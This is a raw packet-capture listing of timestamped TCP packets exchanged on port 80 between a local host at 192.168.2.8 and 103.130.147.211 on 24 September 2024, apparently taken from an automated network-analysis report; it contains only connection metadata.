                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643563986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643575907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643594980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643608093 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643615961 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643630981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643646955 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643654108 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643663883 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643681049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643688917 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643698931 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643709898 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643750906 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643755913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643785000 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643798113 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643800020 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643817902 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643831968 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643835068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643851995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.643874884 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644217968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644232988 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644249916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644267082 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644304991 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644325018 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644340992 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644356012 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644371986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644382000 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644401073 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644417048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644417048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644434929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644450903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644462109 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644467115 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644479990 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644485950 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644500017 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644505024 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644541979 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644589901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644604921 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644618988 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644627094 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644632101 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644648075 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644663095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644665003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644679070 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644689083 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644695044 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644711018 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644732952 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.644754887 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666191101 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666203022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666214943 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666234970 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666246891 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666260004 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666271925 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666280985 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666280985 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666299105 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.666379929 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691112995 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691132069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691144943 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691162109 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691195965 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691200018 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691200972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691207886 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691222906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691263914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691271067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691271067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.691298008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697174072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697221994 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697232962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697241068 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697257996 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697271109 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697299957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697320938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697320938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697360992 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697534084 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.697618008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706541061 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706552982 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706563950 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706574917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706588984 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706650972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706686974 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706701040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706712961 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706743956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706779957 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706861973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706875086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706886053 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706896067 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706908941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706917048 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706918955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706931114 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706943035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.706964970 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707005024 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707340956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707354069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707364082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707375050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707408905 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707423925 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707487106 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707499027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707511902 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707521915 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707566977 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.707566977 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709711075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709793091 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709892988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709903955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709916115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709927082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709938049 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709949970 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.709976912 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710046053 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710058928 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710078001 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710088968 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710103035 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710105896 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710118055 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710129023 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710134029 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710213900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710222006 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710258007 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710402966 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710413933 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710442066 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710583925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710597038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710614920 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710625887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710628986 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710647106 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710659027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710664034 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710669041 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710686922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710704088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710709095 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710722923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710725069 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710735083 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710753918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710764885 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710767984 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710813999 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.710846901 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712625980 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712640047 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712651014 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712670088 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712732077 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712752104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712764025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712776899 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712786913 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712796926 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712836027 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.712836027 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715071917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715085030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715102911 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715112925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715123892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715135098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715136051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715168953 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715204954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715261936 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715634108 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715792894 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715805054 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715873957 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715929031 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715941906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.715951920 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716007948 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716018915 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716085911 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716097116 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716108084 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716120005 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716130972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716149092 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716236115 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716403961 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.721158028 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731112957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731133938 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731147051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731158018 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731177092 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731189013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731199026 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731199026 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731250048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731303930 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731429100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.731524944 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732604027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732624054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732633114 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732662916 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732695103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732697010 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732707024 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732718945 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732729912 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732743979 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732773066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732788086 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732829094 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732858896 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732882023 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732892990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732929945 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732961893 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732976913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.732988119 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733000040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733011007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733020067 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733035088 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733045101 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733079910 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733465910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733477116 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733488083 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733529091 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733563900 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733619928 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733632088 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733643055 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733654022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733664036 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733673096 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.733704090 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734775066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734795094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734803915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734839916 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734863043 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734879971 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734889984 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734929085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.734931946 CEST8049735103.130.147.211192.168.2.8
